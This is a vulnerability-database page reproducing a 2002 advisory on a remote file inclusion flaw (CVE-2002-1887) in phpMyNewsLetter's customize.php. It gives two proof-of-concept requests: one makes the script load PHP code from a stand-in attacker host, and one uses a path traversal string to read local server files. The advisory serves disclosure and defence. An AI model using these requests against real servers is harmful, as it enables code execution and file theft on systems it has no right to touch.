Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-1887

Publish Date: 03 Oct 2002

Author: frog

                							

                source: http://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. 

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&amp;text=Hello%20World
With in http://[attacker]/code.txt :
&lt;? echo $text; ?&gt;

or
http://[target]/include/customize.php?l=../path/file/to/view

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

phpMyNewsletter 0.6.10 - Remote File Inclusion

Vulmon Search

About

Products

Connect